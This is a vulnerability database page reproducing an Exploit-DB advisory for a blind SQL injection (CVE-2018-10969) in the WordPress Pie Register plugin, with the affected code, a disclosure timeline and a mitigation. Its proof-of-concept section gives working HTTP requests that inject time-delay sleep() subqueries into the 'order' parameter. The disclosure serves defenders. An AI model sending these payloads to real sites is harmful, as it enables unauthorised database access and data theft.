Vulners
Lucene search
WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
🗓️ 11 Jun 2018 00:00:00Reported by Manuel García CárdenasType 
exploitdb🔗 www.exploit-db.com👁 33 Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | WordPress Pie Register Plugin < 3.0.9 - Blind SQL Injection Vulnerability | 11 Jun 201800:00 | – | zdt |
 | WordPress Pie Register Plugin SQL Injection Vulnerability | 15 Jun 201800:00 | – | cnvd |
 | WordPress Pie Register Plugin SQL Injection (CVE-2018-10969) | 28 Jun 202000:00 | – | checkpoint_advisories |
 | CVE-2018-10969 | 17 Jun 201816:00 | – | cve |
 | CVE-2018-10969 | 17 Jun 201816:00 | – | cvelist |
 | WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection | 11 Jun 201800:00 | – | exploitpack |
 | CVE-2018-10969 | 17 Jun 201816:29 | – | nvd |
 | CVE-2018-10969 | 17 Jun 201816:29 | – | osv |
 | WordPress Pie Register Blind SQL Injection | 11 Jun 201800:00 | – | packetstorm |
 | Sql injection | 17 Jun 201816:29 | – | prion |
10
# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
# Author: Manuel García Cárdenas
# Date: 2018-05-10
# Software: WordPress Plugin Pie Register 3.0.9
# CVE: CVE-2018-10969
# I. VULNERABILITY
# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection
# II. BACKGROUND
# Pie-Register is a quick and easy way to brand your Registration Pages on
# WordPress sites.
# III. DESCRIPTION
# This bug was found using the portal in the files:
# /pie-register/classes/invitation_code_pagination.php: if ( isset(
# $_GET['order'] ) && $_GET['order'] )
# /pie-register/classes/invitation_code_pagination.php: $order =
# $_GET['order'];
# And when the query is executed, the parameter "order" it is not sanitized.
# /pie-register/classes/invitation_code_pagination.php: $this->order = esc_sql( $order );
# IV. PROOF OF CONCEPT
# The following URL have been confirmed to all suffer from Time Based SQL Injection.
GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc
(original)
GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a)
HTTP/1.1(2 seconds of response)
GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a)
HTTP/1.1(30 seconds of response)
# V. SYSTEMS AFFECTED
# Pie Register <= 3.0.9
# VI. DISCLOSURE TIMELINE
# May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
# May 10, 2018 2: Send to vendor without response
# June 05, 2018 3: Second email to vendor without response
# June 11, 2018 4: Send to the Full-Disclosure lists
# VII. Solution
# Disable plugin until a fix is availableData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Jun 2018 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 27.5
CVSS 39.8
EPSS0.18728